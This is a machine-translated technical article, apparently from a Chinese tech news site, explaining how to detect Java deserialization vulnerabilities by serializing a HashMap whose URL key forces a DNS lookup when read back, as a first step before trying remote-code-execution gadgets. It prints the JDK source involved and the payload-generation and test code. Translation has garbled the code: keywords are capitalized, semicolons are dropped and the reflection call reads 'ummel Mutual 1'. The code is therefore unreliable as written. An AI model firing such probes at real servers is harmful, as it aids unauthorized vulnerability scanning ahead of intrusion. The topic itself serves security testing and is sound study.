Shulou(Shulou.com)06/01 Report--

This article introduces the knowledge of "how to trigger DNS to detect Java deserialization vulnerabilities through HashMap". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Detecting Java deserialization vulnerabilities through HashMap triggering DNS

We often refer to deserialization vulnerabilities that are triggered at the readObject () method, but there are different starting points for different serialization formats, such as fastjson running the setter,getter method automatically. Then there are various RMI,JNDI postures to carry out orders. Now the common black box detection Java deserialization method is to execute the command API, such as using a gadget to execute the nslookup xxx and finally judging by the server record.

But one problem with this approach is that the gadget server you choose to test doesn't have the jar package or has been updated, but there is another flawed jar package. At this point, the execution command payload constructed by a single gadget will fail to report. So in order to solve this problem, here is an idea to trigger DNS checking through HashMap combined with URL. In the actual process, you can first use this to determine whether the server uses readObject () and whether it can be executed. Then try RCE with a variety of gadget.

HashMap readObject & URLStreamHandler hashCode

HashMap first appeared in JDK 1.2, and the underlying implementation is based on hashing algorithms. It is precisely because in HashMap, the storage location of Entry is calculated according to the Hash value of Key, and then stored in the array. So for the same Key, the calculated Hash values may be different in different JVM implementations. Therefore, HashMap implements its own writeObject and readObject methods.

Since we're looking at deserialization, let's take a look at its readObject method.

The previous methods are mainly used to prevent data inconsistencies, which we can ignore. Mainly look at putVal when key entered the hash method, follow up.

Static final int hash (Object key) {

Int h

Return (key = = null)? 0: (h = key.hashCode ()) ^ (h > 16)

}

The hashCode method of key is called directly here. So now we need a class hashCode that can execute something.

Fortunately, we found the URL class, which has an interesting feature that triggers the current URLStreamHandler's hashCode method when the hashCode method is executed.

Public synchronized int hashCode () {

If (hashCode! =-1)

Return hashCode

HashCode = handler.hashCode (this)

Return hashCode

}

We can follow up.

Protected int hashCode (URL u) {

Int h = 0

/ / Generate the protocol part.

String protocol = u.getProtocol ()

If (protocol! = null)

H + = protocol.hashCode ()

/ / Generate the host part.

InetAddress addr = getHostAddress (u)

If (addr! = null) {

H + = addr.hashCode ()

} else {

String host = u.getHost ()

If (host! = null)

H + = host.toLowerCase () .hashCode ()

}

/ / Generate the file part.

String file = u.getFile ()

If (file! = null)

H + = file.hashCode ()

/ / Generate the port part.

If (u.getPort () =-1)

H + = getDefaultPort ()

Else

H + = u.getPort ()

/ / Generate the ref part.

String ref = u.getRef ()

If (ref! = null)

H + = ref.hashCode ()

Return h

}

This is mainly the code.

InetAddress addr = getHostAddress (u)

Quite simply, this is where the DNS query is finally triggered.

That is to say, our idea now is to put a key of URL through hashmap and then trigger the DNS query. One thing to note here is that a cache judgment is first made in the hashCode method of URLStreamHandler, that is, if it is not equal to-1, it will directly return.

If (hashCode! =-1)

Return hashCode

Because the hashCode method is called when the hashMap put is generated, it is cached, that is, the hashcode is not-1. So in order for the recipient to trigger the DNS query, we need to change the hashcode value to-1 through reflection to bypass the cache judgment.

Field field = u.getClass () .getDeclaredField ("hashCode")

Field.setAccessible (true)

Field.set (ummel Mutual 1)

The resulting code is:

ObjectOutputStream oos = new ObjectOutputStream (new FileOutputStream ("object.obj"))

String url= "https://www.xttblog.com";

HashMap hashMap = new HashMap (); / / HashMap that will contain the URL

URL u = new URL (url); / / URL to use as the Key

HashMap.put (u, url); / / The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

Field field = u.getClass () .getDeclaredField ("hashCode")

Field.setAccessible (true)

Field.set (ummel Mutual 1)

Oos.writeObject (hashMap)

Oos.flush ()

Oos.close ()

Test the code:

ObjectInputStream ois=new ObjectInputStream (new FileInputStream ("object.obj"))

Ois.readObject ()

Call stack:

Eventually you will find that the DNS query has been successfully triggered.

This is the end of "how to detect Java deserialization vulnerabilities through HashMap triggering DNS". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.